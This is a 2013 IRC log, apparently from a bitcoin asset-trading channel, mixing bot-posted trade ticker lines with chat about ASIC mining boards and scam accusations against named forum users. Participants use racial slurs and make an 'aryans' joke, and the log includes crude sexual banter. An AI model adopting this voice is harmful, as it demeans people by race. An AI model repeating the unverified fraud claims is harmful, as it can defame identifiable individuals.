[S.MPOE] 1902 @ 0.00082826 = 1.5754 BTC [+] Jul 01 05:55:29 [MPEX] [S.MPOE] 2492 @ 0.00083042 = 2.0694 BTC [+] Jul 01 05:57:05 [BTCTC] [ESECURITYSABTC] 1 @ 0.2708 BTC [+] Jul 01 05:58:32 [HAVELOCK] [HIM] 5 @ 0.299999 = 1.5 BTC [-] Jul 01 05:59:09 [HAVELOCK] [ASICM] 58 @ 0.0425 = 2.465 BTC [+] Jul 01 06:00:58 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Jul 01 06:02:12 [HAVELOCK] [VTX] 1 @ 0.51 BTC [+] Jul 01 06:03:55 [BTCTC] [TAT.ASICMINER] 13 @ 0.043099 = 0.5603 BTC [-] Jul 01 06:03:58 [BTCTC] [TAT.ASICMINER] 32 @ 0.0431 = 1.3792 BTC [+] Jul 01 06:04:58 [BTCTC] [ASICMINER-PT] 1 @ 4.294 BTC [-] Jul 01 06:05:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.0431 BTC [+] Jul 01 06:06:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.0431 BTC [+] Jul 01 06:08:16 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Jul 01 06:10:23 [BTCTC] [DMS.SELLING] 20 @ 0.029601 = 0.592 BTC [-] Jul 01 06:10:24 [BTCTC] [DMS.SELLING] 10 @ 0.0296 = 0.296 BTC [-] Jul 01 06:10:41 [BTCTC] [TAT.ASICMINER] 47 @ 0.0427 = 2.0069 BTC [-] Jul 01 06:11:18 [BTCTC] [TAT.ASICMINER] 16 @ 0.0431 = 0.6896 BTC [+] Jul 01 06:11:34 [BTCTC] [DMS.SELLING] 10 @ 0.029603 = 0.296 BTC [+] Jul 01 06:11:36 [BTCTC] [DMS.SELLING] 10 @ 0.0296 = 0.296 BTC [-] Jul 01 06:12:27 [HAVELOCK] [ASICM] 1 @ 0.0429999 BTC [+] Jul 01 06:12:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.0432 = 0.432 BTC [+] Jul 01 06:14:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.0433 BTC [+] Jul 01 06:14:09 [BTCTC] [CRYPTO-TRADE] 7 @ 0.2 = 1.4 BTC [+] Jul 01 06:14:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.0433 BTC [+] Jul 01 06:14:59 [HAVELOCK] [ASICM] 1 @ 0.042102 BTC [-] Jul 01 06:15:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.0433 BTC [+] **** BEGIN LOGGING AT Mon Jul 1 16:14:48 2013 Jul 01 16:15:16 [HAVELOCK] [SDICE] 1 @ 0.19999998 BTC [+] Jul 01 16:16:19 kakobrekla, are you getting a bunch of them? are you making boards or something? taking orders? :D Jul 01 16:16:54 well i have the capacity but dunno if theres a will Jul 01 16:16:55 [BTCTC] [TAT.ASICMINER] 260 @ 0.045 = 11.7 BTC [+] Jul 01 16:17:28 so Jul 01 16:17:29 lol Jul 01 16:17:31 can i order Jul 01 16:17:44 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Jul 01 16:19:08 well one can order a hooker in a bakery, and you will get it, but only if its a really good bakery Jul 01 16:19:09 [HAVELOCK] [ASICM] 315 @ 0.04444 = 13.9986 BTC [+] Jul 01 16:19:26 sorry i have been up for too long Jul 01 16:19:33 [BTCTC] [ASICMINER-PT] 2 @ 4.500001 = 9 BTC [-] Jul 01 16:19:34 [BTCTC] [ASICMINER-PT] 1 @ 4.5 BTC [-] Jul 01 16:19:38 lol Jul 01 16:19:53 kakobrekla : to quote my commenters, "You seem to be stark raving mad." Jul 01 16:20:16 heh Jul 01 16:24:00 [BTCTC] [ASICMINER-PT] 1 @ 4.460001 BTC [-] Jul 01 16:24:08 [BTCTC] [ASICMINER-PT] 1 @ 4.46 BTC [-] Jul 01 16:24:14 man Jul 01 16:24:28 http://www.youtube.com/watch?v=0yS3cnsr6ac Jul 01 16:24:29 Best of AMV Hell 6.66 - YouTube Jul 01 16:24:32 skip to 8:30 Jul 01 16:24:34 wait for the chick Jul 01 16:24:38 why does that chick look wrong Jul 01 16:24:43 I cant quite put my finger on it Jul 01 16:25:06 [BTCTC] [AMC-PT] 100 @ 0.001099 = 0.1099 BTC [-] Jul 01 16:25:25 [BTCTC] [AMC-PT] 295 @ 0.0011 = 0.3245 BTC [+] Jul 01 16:25:27 [BTCTC] [AMC-PT] 100 @ 0.0011 = 0.11 BTC [+] Jul 01 16:26:28 [HAVELOCK] [ASICM] 2 @ 0.04444 = 0.0889 BTC [+] Jul 01 16:27:40 if anyone is watching s.mg : http://trilema.com/2013/bad-error-messages-good-error-messages/#comment-93784 Jul 01 16:29:57 [BTCTC] [TAT.ASICMINER] 210 @ 0.045 = 9.45 BTC [+] Jul 01 16:33:08 [BTCTC] [TAT.ASICMINER] 118 @ 0.045 = 5.31 BTC [+] Jul 01 16:33:12 [BTCTC] [TAT.ASICMINER] 25 @ 0.045 = 1.125 BTC [+] Jul 01 16:33:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.045 = 0.09 BTC [+] Jul 01 16:33:17 [BTCTC] [TAT.ASICMINER] 10 @ 0.045 = 0.45 BTC [+] Jul 01 16:33:31 for the infidels dunno i would need b Jul 01 16:33:33 blah Jul 01 16:33:36 fucking paste Jul 01 16:33:53 [BTCTC] [ASICMINER-PT] 7 @ 4.549999 = 31.85 BTC [+] Jul 01 16:33:54 this http://shrani.si/f/34/13D/1vCcNryh/imag0327.jpg Jul 01 16:34:09 [BTCTC] [TAT.ASICMINER] 51 @ 0.046 = 2.346 BTC [+] Jul 01 16:34:17 [BTCTC] [ASICMINER-PT] 1 @ 4.55 BTC [+] Jul 01 16:34:28 kakobrekla: what are those? Jul 01 16:34:33 fury asic Jul 01 16:34:37 [BTCTC] [ASICMINER-PT] 8 @ 4.5899 = 36.7192 BTC [+] Jul 01 16:34:55 [BTCTC] [ASICMINER-PT] 1 @ 4.589994 BTC [+] Jul 01 16:35:20 [BTCTC] [ASICMINER-PT] 10 @ 4.6 = 46 BTC [+] Jul 01 16:35:21 oh, bitfury. I read it as furry asics Jul 01 16:35:21 [HAVELOCK] [ASICM] 34 @ 0.045 = 1.53 BTC [+] Jul 01 16:35:50 [BTCTC] [ASICMINER-PT] 2 @ 4.65 = 9.3 BTC [+] Jul 01 16:36:53 [BTCTC] [ASICMINER-PT] 7 @ 4.659 = 32.613 BTC [+] Jul 01 16:37:30 lol pankkake would like some furry ass-icks ? Jul 01 16:37:39 [BTCTC] [TAT.ASICMINER] 60 @ 0.04699 = 2.8194 BTC [+] Jul 01 16:37:52 [HAVELOCK] [ASICM] 33 @ 0.04444 = 1.4665 BTC [-] Jul 01 16:38:17 [HAVELOCK] [ASICM] 109 @ 0.044001 = 4.7961 BTC [-] Jul 01 16:38:19 [HAVELOCK] [ASICM] 858 @ 0.044 = 37.752 BTC [-] Jul 01 16:38:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.0475 = 0.2375 BTC [+] Jul 01 16:38:33 [BTCTC] [TAT.ASICMINER] 7 @ 0.0475 = 0.3325 BTC [+] Jul 01 16:43:09 [BTCTC] [AMC-PT] 10 @ 0.001152 = 0.0115 BTC [+] Jul 01 16:45:04 furry ass-licks? y'all need to stop smearing peanut butter on yourselves -- your pets are not sex toys! Jul 01 16:45:10 [HAVELOCK] [ASICM] 1 @ 0.0445 BTC [+] Jul 01 16:45:49 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 01 16:47:39 [HAVELOCK] [ASICM] 2 @ 0.04499 = 0.09 BTC [+] Jul 01 16:47:47 [HAVELOCK] [ASICM] 3 @ 0.04499 = 0.135 BTC [+] Jul 01 16:47:56 [HAVELOCK] [ASICM] 1 @ 0.04499 BTC [+] Jul 01 16:48:08 [HAVELOCK] [ASICM] 11 @ 0.04499 = 0.4949 BTC [+] Jul 01 16:50:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.047299 = 0.2365 BTC [-] Jul 01 16:50:44 [BTCTC] [BTC-TRADING-PT] 1 @ 0.85 BTC [+] Jul 01 16:51:41 [BTCTC] [S.DICE-PT] 70 @ 0.002323 = 0.1626 BTC [+] Jul 01 16:52:23 [BTCTC] [S.DICE-PT] 203 @ 0.002324 = 0.4718 BTC [+] Jul 01 16:53:07 [BTCTC] [S.DICE-PT] 35 @ 0.002325 = 0.0814 BTC [+] Jul 01 16:53:13 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 01 16:54:10 [BTCTC] [ASICMINER-PT] 1 @ 4.659 BTC [+] Jul 01 16:54:20 [BTCTC] [ASICMINER-PT] 2 @ 4.65999 = 9.32 BTC [+] Jul 01 16:54:30 [BTCTC] [ASICMINER-PT] 1 @ 4.65999 BTC [+] Jul 01 16:55:09 [BTCTC] [TAT.ASICMINER] 45 @ 0.047299 = 2.1285 BTC [-] Jul 01 16:55:11 [BTCTC] [TAT.ASICMINER] 14 @ 0.0474 = 0.6636 BTC [+] Jul 01 16:55:13 [BTCTC] [TAT.ASICMINER] 29 @ 0.0474 = 1.3746 BTC [+] Jul 01 16:55:14 [BTCTC] [TAT.ASICMINER] 27 @ 0.0475 = 1.2825 BTC [+] Jul 01 16:55:16 [BTCTC] [ASICMINER-PT] 1 @ 4.6799 BTC [+] Jul 01 16:56:17 [HAVELOCK] [ASICM] 3 @ 0.044989 = 0.135 BTC [-] Jul 01 16:56:33 [HAVELOCK] [ASICM] 1 @ 0.044989 BTC [-] Jul 01 17:00:27 [BTCTC] [ASICMINER-PT] 1 @ 4.600001 BTC [-] Jul 01 17:01:12 [HAVELOCK] [ASICM] 2 @ 0.044989 = 0.09 BTC [-] Jul 01 17:01:59 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 01 17:02:01 [BTCTC] [ASICMINER-PT] 2 @ 4.6 = 9.2 BTC [-] Jul 01 17:02:21 [HAVELOCK] [SDICE] 7 @ 0.195 = 1.365 BTC [-] Jul 01 17:08:14 [MPEX] [S.MPOE] 2200 @ 0.00082595 = 1.8171 BTC [+] Jul 01 17:08:41 [BTCTC] [ASICMINER-PT] 2 @ 4.550002 = 9.1 BTC [-] Jul 01 17:09:49 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0051 = 0.51 BTC [-] Jul 01 17:10:18 [BTCTC] [TAT.ASICMINER] 4 @ 0.04848 = 0.1939 BTC [+] Jul 01 17:10:30 https://bitcointalk.org/index.php?topic=247640.0 Jul 01 17:10:37 SCAMHACKER TradeFortress - Alt of Pirateat40 Jul 01 17:10:54 [HAVELOCK] [KCIM] 1 @ 1.028999 BTC [+] Jul 01 17:11:07 [HAVELOCK] [KCIM] 1 @ 1.029 BTC [+] Jul 01 17:11:11 [BTCTC] [TAT.ASICMINER] 42 @ 0.04848 = 2.0362 BTC [+] Jul 01 17:14:43 [BTCTC] [ASICMINER-PT] 1 @ 4.550008 BTC [+] Jul 01 17:16:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.048 = 0.144 BTC [-] Jul 01 17:18:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.048 BTC [-] Jul 01 17:18:51 [BTCTC] [TAT.ASICMINER] 3 @ 0.048 = 0.144 BTC [-] Jul 01 17:19:00 " I have concluded with 100% doubt that he is an alt of pirateat40." Jul 01 17:19:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.0482 = 0.0964 BTC [+] Jul 01 17:19:44 [BTCTC] [TAT.ASICMINER] 17 @ 0.0482 = 0.8194 BTC [+] Jul 01 17:20:15 i was actually just thinking a few days ago, wondering why everyone trusts coinlenders Jul 01 17:20:44 every other loan provider does shitty, but somehow his can pay consistently Jul 01 17:21:28 "with 100% doubt" Jul 01 17:22:54 [BTCTC] [ASICMINER-PT] 1 @ 4.629999 BTC [+] Jul 01 17:23:15 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.004347 = 0.4347 BTC [-] Jul 01 17:23:17 [HAVELOCK] [VTX] 1 @ 0.509999 BTC [+] Jul 01 17:23:47 [HAVELOCK] [ASICM] 13 @ 0.044989 = 0.5849 BTC [-] Jul 01 17:24:17 [BTCTC] [AMC-PT] 200 @ 0.0011 = 0.22 BTC [-] Jul 01 17:25:22 [BTCTC] [TAT.ASICMINER] 62 @ 0.04819 = 2.9878 BTC [-] Jul 01 17:26:16 [BTCTC] [TAT.ASICMINER] 62 @ 0.04819 = 2.9878 BTC [-] Jul 01 17:26:25 ThickAsThieves iirc he doesn't take very much, and scams people on ripple to make mad crazy .5 btc profits Jul 01 17:26:38 [BTCTC] [ASICMINER-PT] 1 @ 4.629995 BTC [-] Jul 01 17:27:11 https://bitcointalk.org/index.php?topic=235823.0 Jul 01 17:27:15 Scammer label for Payb.tc/E&G (user 25846) (BitcoinMax) Jul 01 17:27:34 hanging out in the scam forum seems like a bad habit Jul 01 17:27:51 when i first posted in there i was like hmm i need to gtfo Jul 01 17:32:30 [BTCTC] [B.YABMC] 23 @ 0.00989 = 0.2275 BTC [+] Jul 01 17:32:54 [HAVELOCK] [ASICM] 5 @ 0.043601 = 0.218 BTC [-] Jul 01 17:34:24 hanging on teh forum is a bad habit entirely. Jul 01 17:34:28 still, it's sort of like the zoo. Jul 01 17:34:38 gotta keep in touch with nature. Jul 01 17:36:30 [BTCTC] [TAT.ASICMINER] 50 @ 0.046001 = 2.3001 BTC [-] Jul 01 17:36:32 [BTCTC] [TAT.ASICMINER] 23 @ 0.046 = 1.058 BTC [-] Jul 01 17:37:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.04785 = 0.1436 BTC [+] Jul 01 17:37:50 [BTCTC] [ASICMINER-PT] 1 @ 4.59 BTC [-] Jul 01 17:37:53 [BTCTC] [ASICMINER-PT] 1 @ 4.58 BTC [-] Jul 01 17:37:55 [BTCTC] [ASICMINER-PT] 1 @ 4.57 BTC [-] Jul 01 17:37:57 [BTCTC] [ASICMINER-PT] 1 @ 4.56 BTC [-] Jul 01 17:38:39 [BTCTC] [AMC-PT] 6 @ 0.00108 = 0.0065 BTC [-] Jul 01 17:38:43 [BTCTC] [AMC-PT] 5 @ 0.00108 = 0.0054 BTC [-] Jul 01 17:38:45 [BTCTC] [AMC-PT] 100 @ 0.00103 = 0.103 BTC [-] Jul 01 17:38:45 [BTCTC] [AMC-PT] 5 @ 0.00102 = 0.0051 BTC [-] Jul 01 17:38:46 [BTCTC] [AMC-PT] 9 @ 0.001018 = 0.0092 BTC [-] Jul 01 17:38:48 [BTCTC] [AMC-PT] 3 @ 0.001015 = 0.003 BTC [-] Jul 01 17:38:49 [BTCTC] [AMC-PT] 99 @ 0.001014 = 0.1004 BTC [-] Jul 01 17:38:50 [BTCTC] [AMC-PT] 190 @ 0.001013 = 0.1925 BTC [-] Jul 01 17:38:51 [BTCTC] [AMC-PT] 12 @ 0.001013 = 0.0122 BTC [-] Jul 01 17:38:52 [BTCTC] [AMC-PT] 571 @ 0.001012 = 0.5779 BTC [-] Jul 01 17:39:28 [BTCTC] [ASICMINER-PT] 1 @ 4.619998 BTC [+] Jul 01 17:40:42 [MPEX] [S.MPOE] 2550 @ 0.00082595 = 2.1062 BTC [+] Jul 01 17:40:52 [BTCTC] [TAT.ASICMINER] 12 @ 0.04775 = 0.573 BTC [-] Jul 01 17:42:31 [BTCTC] [TAT.ASICMINER] 15 @ 0.046 = 0.69 BTC [-] Jul 01 17:42:51 [HAVELOCK] [HIM] 1 @ 0.3 BTC [+] Jul 01 17:46:00 [HAVELOCK] [SDICE] 3 @ 0.195 = 0.585 BTC [-] Jul 01 17:46:14 [BTCTC] [ASICMINER-PT] 1 @ 4.619999 BTC [+] Jul 01 17:47:01 [BTCTC] [ASICMINER-PT] 1 @ 4.62 BTC [+] Jul 01 17:47:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.0477 BTC [+] Jul 01 17:48:13 [BTCTC] [AMC-PT] 1 @ 0.001165 BTC [+] Jul 01 17:48:46 [BTCTC] [PAJKA.BOND] 8 @ 0.058959 = 0.4717 BTC [-] Jul 01 17:48:49 [BTCTC] [PAJKA.BOND] 2 @ 0.05896 = 0.1179 BTC [+] Jul 01 17:49:29 [BTCTC] [TAT.ASICMINER] 21 @ 0.0477 = 1.0017 BTC [+] Jul 01 17:49:48 [BTCTC] [AMC-PT] 2 @ 0.001165 = 0.0023 BTC [+] Jul 01 17:50:10 [BTCTC] [DMS.SELLING] 10 @ 0.029989 = 0.2999 BTC [+] Jul 01 17:51:20 [BTCTC] [ASICMINER-PT] 1 @ 4.64 BTC [+] Jul 01 17:51:37 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.004354 = 0.0479 BTC [+] Jul 01 17:51:42 [BTCTC] [B.YABMC] 297 @ 0.00989 = 2.9373 BTC [+] Jul 01 17:52:14 [BTCTC] [CRYPTO-TRADE] 13 @ 0.19875 = 2.5838 BTC [-] Jul 01 17:52:16 [BTCTC] [ASICMINER-PT] 1 @ 4.65 BTC [+] Jul 01 17:52:21 [BTCTC] [ASICMINER-PT] 1 @ 4.658 BTC [+] Jul 01 17:52:23 [BTCTC] [ASICMINER-PT] 10 @ 4.659 = 46.59 BTC [+] Jul 01 17:52:25 [BTCTC] [ASICMINER-PT] 1 @ 4.66 BTC [+] Jul 01 17:52:58 [BTCTC] [TAT.ASICMINER] 8 @ 0.0475 = 0.38 BTC [-] Jul 01 17:55:19 quiet ass weekend Jul 01 17:55:26 quiet ass monday Jul 01 17:55:34 you niggas need to wake up Jul 01 17:56:14 [BTCTC] [AMC-PT] 7 @ 0.001165 = 0.0082 BTC [+] Jul 01 17:56:15 [BTCTC] [AMC-PT] 19 @ 0.001167 = 0.0222 BTC [+] Jul 01 17:57:22 [BTCTC] [DMS.MINING] 1 @ 0.02 BTC [-] Jul 01 17:58:23 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005199 BTC [+] Jul 01 17:59:33 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005199 BTC [+] Jul 01 18:02:33 [BTCTC] [TAT.ASICMINER] 50 @ 0.047499 = 2.375 BTC [-] Jul 01 18:02:35 [BTCTC] [TAT.ASICMINER] 47 @ 0.0475 = 2.2325 BTC [+] Jul 01 18:05:11 [BTCTC] [TAT.ASICMINER] 8 @ 0.0475 = 0.38 BTC [+] Jul 01 18:05:15 [BTCTC] [TAT.ASICMINER] 8 @ 0.0475 = 0.38 BTC [+] Jul 01 18:05:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.0475 BTC [+] Jul 01 18:06:13 [HAVELOCK] [ASICM] 4 @ 0.0437 = 0.1748 BTC [+] Jul 01 18:06:42 [HAVELOCK] [ASICM] 25 @ 0.0439 = 1.0975 BTC [+] Jul 01 18:08:47 [BTCTC] [TAT.ASICMINER] 6 @ 0.0475 = 0.285 BTC [+] Jul 01 18:09:07 thestringpuller: no niggers here, sorry Jul 01 18:09:13 [BTCTC] [BASIC-MINING] 2 @ 0.18 = 0.36 BTC [-] Jul 01 18:09:50 thestringpuller: only proper aryans (except maybe some romanian managed to sneak in) Jul 01 18:16:08 [BTCTC] [AMC-PT] 7 @ 0.001013 = 0.0071 BTC [-] Jul 01 18:16:09 [BTCTC] [AMC-PT] 10 @ 0.001013 = 0.0101 BTC [-] Jul 01 18:16:10 [BTCTC] [AMC-PT] 100 @ 0.001013 = 0.1013 BTC [-] Jul 01 18:19:36 [BTCTC] [AMC-PT] 1216 @ 0.001013 = 1.2318 BTC [-] Jul 01 18:20:05 [MPEX] [S.MPOE] 763 @ 0.00082529 = 0.6297 BTC [-] Jul 01 18:20:07 [MPEX] [S.MPOE] 6187 @ 0.00082518 = 5.1054 BTC [-] Jul 01 18:20:17 [HAVELOCK] [ASICM] 2 @ 0.044979 = 0.09 BTC [+] Jul 01 18:21:38 [BTCTC] [RSM] 6 @ 0.015021 = 0.0901 BTC [+] Jul 01 18:22:16 [BTCTC] [ASICMINER-PT] 1 @ 4.65 BTC [-] Jul 01 18:22:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.0475 = 0.095 BTC [+] Jul 01 18:23:28 [BTCTC] [ASICMINER-PT] 5 @ 4.66 = 23.3 BTC [+] Jul 01 18:23:49 [BTCTC] [TAT.ASICMINER] 17 @ 0.0475 = 0.8075 BTC [+] Jul 01 18:23:51 [BTCTC] [TAT.ASICMINER] 11 @ 0.0475 = 0.5225 BTC [+] Jul 01 18:24:04 nigga not nigger da fuck is wrong wit u Jul 01 18:24:11 come on mang Jul 01 18:24:41 hi guys Jul 01 18:24:46 [BTCTC] [ASICMINER-PT] 1 @ 4.65 BTC [-] Jul 01 18:24:50 does anyone have bugpowders spreadsheet? Jul 01 18:25:03 [BTCTC] [ASICMINER-PT] 3 @ 4.65 = 13.95 BTC [-] Jul 01 18:26:25 [BTCTC] [ASICMINER-PT] 4 @ 4.65 = 18.6 BTC [-] Jul 01 18:27:12 [BTCTC] [ASICMINER-PT] 1 @ 4.66 BTC [+] Jul 01 18:27:51 [BTCTC] [ASICMINER-PT] 3 @ 4.65 = 13.95 BTC [-] Jul 01 18:28:26 [HAVELOCK] [ASICM] 61 @ 0.044979 = 2.7437 BTC [+] Jul 01 18:29:39 [BTCTC] [ASICMINER-PT] 4 @ 4.66 = 18.64 BTC [+] Jul 01 18:30:25 [BTCTC] [S.DICE-PT] 3 @ 0.002348 = 0.007 BTC [+] Jul 01 18:30:58 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 01 18:31:44 [BTCTC] [TAT.ASICMINER] 50 @ 0.047001 = 2.3501 BTC [-] Jul 01 18:31:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.04691 BTC [-] Jul 01 18:31:48 [BTCTC] [TAT.ASICMINER] 5 @ 0.0469 = 0.2345 BTC [-] Jul 01 18:31:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.0465 = 0.093 BTC [-] Jul 01 18:31:52 [BTCTC] [TAT.ASICMINER] 6 @ 0.0451 = 0.2706 BTC [-] Jul 01 18:32:11 [BTCTC] [TAT.ASICMINER] 17 @ 0.0475 = 0.8075 BTC [+] Jul 01 18:32:32 [HAVELOCK] [ASICM] 10 @ 0.044969 = 0.4497 BTC [-] Jul 01 18:33:04 [BTCTC] [TAT.ASICMINER] 3 @ 0.0451 = 0.1353 BTC [-] Jul 01 18:33:24 [BTCTC] [ASICMINER-PT] 2 @ 4.7 = 9.4 BTC [+] Jul 01 18:34:13 [HAVELOCK] [ASICM] 2 @ 0.044979 = 0.09 BTC [+] Jul 01 18:34:44 [HAVELOCK] [ASICM] 123 @ 0.04498 = 5.5325 BTC [+] Jul 01 18:35:13 [HAVELOCK] [ASICM] 11 @ 0.04499 = 0.4949 BTC [+] Jul 01 18:36:17 [BTCTC] [TAT.ASICMINER] 6 @ 0.0475 = 0.285 BTC [+] Jul 01 18:37:50 [HAVELOCK] [ASICM] 28 @ 0.044969 = 1.2591 BTC [-] Jul 01 18:37:51 [HAVELOCK] [ASICM] 50 @ 0.043518 = 2.1759 BTC [-] Jul 01 18:37:53 [HAVELOCK] [ASICM] 1 @ 0.04351101 BTC [-] Jul 01 18:37:54 [HAVELOCK] [ASICM] 3 @ 0.04351 = 0.1305 BTC [-] Jul 01 18:37:55 [HAVELOCK] [ASICM] 17 @ 0.04329 = 0.7359 BTC [-] Jul 01 18:37:56 [HAVELOCK] [ASICM] 50 @ 0.04251188 = 2.1256 BTC [-] Jul 01 18:37:56 [HAVELOCK] [ASICM] 151 @ 0.042501 = 6.4177 BTC [-] Jul 01 18:45:16 [MPEX] [S.MPOE] 10582 @ 0.00082595 = 8.7402 BTC [+] Jul 01 18:47:09 [BTCTC] [TAT.ASICMINER] 23 @ 0.0451 = 1.0373 BTC [-] Jul 01 18:49:49 [BTCTC] [TAT.ASICMINER] 25 @ 0.046999 = 1.175 BTC [+] Jul 01 18:50:11 [HAVELOCK] [ASICM] 13 @ 0.044 = 0.572 BTC [+] Jul 01 18:51:13 [HAVELOCK] [ASICM] 10 @ 0.04499 = 0.4499 BTC [+] Jul 01 18:51:56 mjr : prolly bugpowder. Jul 01 18:52:18 davout when did froggies become aryans ?! Jul 01 18:54:37 [HAVELOCK] [ASICM] 13 @ 0.04499 = 0.5849 BTC [+] Jul 01 18:55:57 mircea_popescu: when they started giving away all these flyers for this bike race Jul 01 18:56:06 o i c Jul 01 18:56:06 lol Jul 01 18:57:12 [BTCTC] [ASICMINER-PT] 2 @ 4.716 = 9.432 BTC [+] Jul 01 18:57:14 [BTCTC] [ASICMINER-PT] 1 @ 4.71699 BTC [+] Jul 01 18:57:16 [BTCTC] [ASICMINER-PT] 2 @ 4.718 = 9.436 BTC [+] Jul 01 18:58:10 [BTCTC] [TAT.ASICMINER] 25 @ 0.046999 = 1.175 BTC [+] Jul 01 18:58:58 [BTCTC] [TAT.ASICMINER] 50 @ 0.047 = 2.35 BTC [+] Jul 01 18:59:41 [BTCTC] [AMC-PT] 40 @ 0.001129 = 0.0452 BTC [+] Jul 01 18:59:50 [BTCTC] [ASICMINER-PT] 1 @ 4.729 BTC [+] Jul 01 18:59:52 [BTCTC] [ASICMINER-PT] 4 @ 4.729 = 18.916 BTC [+] Jul 01 19:00:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.04699 BTC [-] Jul 01 19:04:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.04699 = 0.094 BTC [-] Jul 01 19:04:21 [BTCTC] [TAT.ASICMINER] 6 @ 0.046501 = 0.279 BTC [-] Jul 01 19:05:11 [BTCTC] [DMS.MINING] 10 @ 0.019999 = 0.2 BTC [-] Jul 01 19:05:24 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [-] Jul 01 19:05:26 [BTCTC] [ASICMINER-PT] 1 @ 4.680002 BTC [-] Jul 01 19:05:28 [BTCTC] [ASICMINER-PT] 2 @ 4.672 = 9.344 BTC [-] Jul 01 19:05:30 [BTCTC] [ASICMINER-PT] 7 @ 4.650001 = 32.55 BTC [-] Jul 01 19:05:32 [BTCTC] [ASICMINER-PT] 2 @ 4.65 = 9.3 BTC [-] Jul 01 19:05:34 [BTCTC] [ASICMINER-PT] 3 @ 4.64 = 13.92 BTC [-] Jul 01 19:05:36 [BTCTC] [ASICMINER-PT] 4 @ 4.6 = 18.4 BTC [-] Jul 01 19:06:56 ;;ticker Jul 01 19:06:57 MtGox BTCUSD ticker | Best bid: 92.10900, Best ask: 92.30000, Bid-ask spread: 0.19100, Last trade: 92.32447, 24 hour volume: 19500.36827999, 24 hour low: 91.68100, 24 hour high: 98.18010, 24 hour vwap: 94.55811 Jul 01 19:06:59 [BTCTC] [TAT.ASICMINER] 27 @ 0.046501 = 1.2555 BTC [-] Jul 01 19:07:45 [BTCTC] [AMC-PT] 1 @ 0.001015 BTC [-] Jul 01 19:07:47 [BTCTC] [AMC-PT] 6 @ 0.001014 = 0.0061 BTC [-] Jul 01 19:07:48 [BTCTC] [AMC-PT] 4 @ 0.001013 = 0.0041 BTC [-] Jul 01 19:09:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.046501 = 0.093 BTC [-] Jul 01 19:10:35 [BTCTC] [TAT.ASICMINER] 15 @ 0.046501 = 0.6975 BTC [-] Jul 01 19:10:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.046501 = 0.1395 BTC [-] Jul 01 19:11:34 [BTCTC] [TAT.ASICMINER] 6 @ 0.046501 = 0.279 BTC [-] Jul 01 19:11:36 [BTCTC] [TAT.ASICMINER] 66 @ 0.046501 = 3.0691 BTC [-] Jul 01 19:11:47 [BTCTC] [TAT.ASICMINER] 12 @ 0.04699 = 0.5639 BTC [+] Jul 01 19:12:59 [BTCTC] [TAT.ASICMINER] 6 @ 0.04699 = 0.2819 BTC [+] Jul 01 19:13:36 [BTCTC] [TAT.ASICMINER] 4 @ 0.04699 = 0.188 BTC [+] Jul 01 19:13:52 [HAVELOCK] [ASICM] 13 @ 0.0449889 = 0.5849 BTC [-] Jul 01 19:13:58 [HAVELOCK] [ASICM] 71 @ 0.0449899 = 3.1943 BTC [+] Jul 01 19:14:08 [HAVELOCK] [ASICM] 1 @ 0.044988 BTC [-] Jul 01 19:14:10 [HAVELOCK] [ASICM] 24 @ 0.04499 = 1.0798 BTC [+] Jul 01 19:14:21 [HAVELOCK] [ASICM] 12 @ 0.04499 = 0.5399 BTC [+] Jul 01 19:16:45 [BTCTC] [BASIC-MINING] 1 @ 0.186899 BTC [+] Jul 01 19:17:57 [BTCTC] [S.DICE-PT] 43 @ 0.002348 = 0.101 BTC [+] Jul 01 19:18:07 I noticed Chaang-Noi disappeared ever since his buddy Garr255 got caught socking Jul 01 19:18:29 ;;seen chaang-noi Jul 01 19:18:30 chaang-noi was last seen in #bitcoin-assets 1 week, 2 days, 23 hours, 36 minutes, and 20 seconds ago: yeah mp, you are getting trolled here Jul 01 19:19:25 it's probably more related to gold/silver getting fucked. Jul 01 19:19:55 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.0051 = 0.0255 BTC [-] Jul 01 19:20:28 [BTCTC] [AMC-PT] 50 @ 0.001125 = 0.0563 BTC [+] Jul 01 19:20:43 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.005 = 0.01 BTC [-] Jul 01 19:20:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.046989 BTC [-] Jul 01 19:20:59 [BTCTC] [ASICMINER-PT] 1 @ 4.699999 BTC [+] Jul 01 19:22:14 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.0051 = 0.1275 BTC [+] Jul 01 19:22:57 [HAVELOCK] [ASICM] 3 @ 0.04314203 = 0.1294 BTC [-] Jul 01 19:23:38 [BTCTC] [AMC-PT] 5 @ 0.001013 = 0.0051 BTC [-] Jul 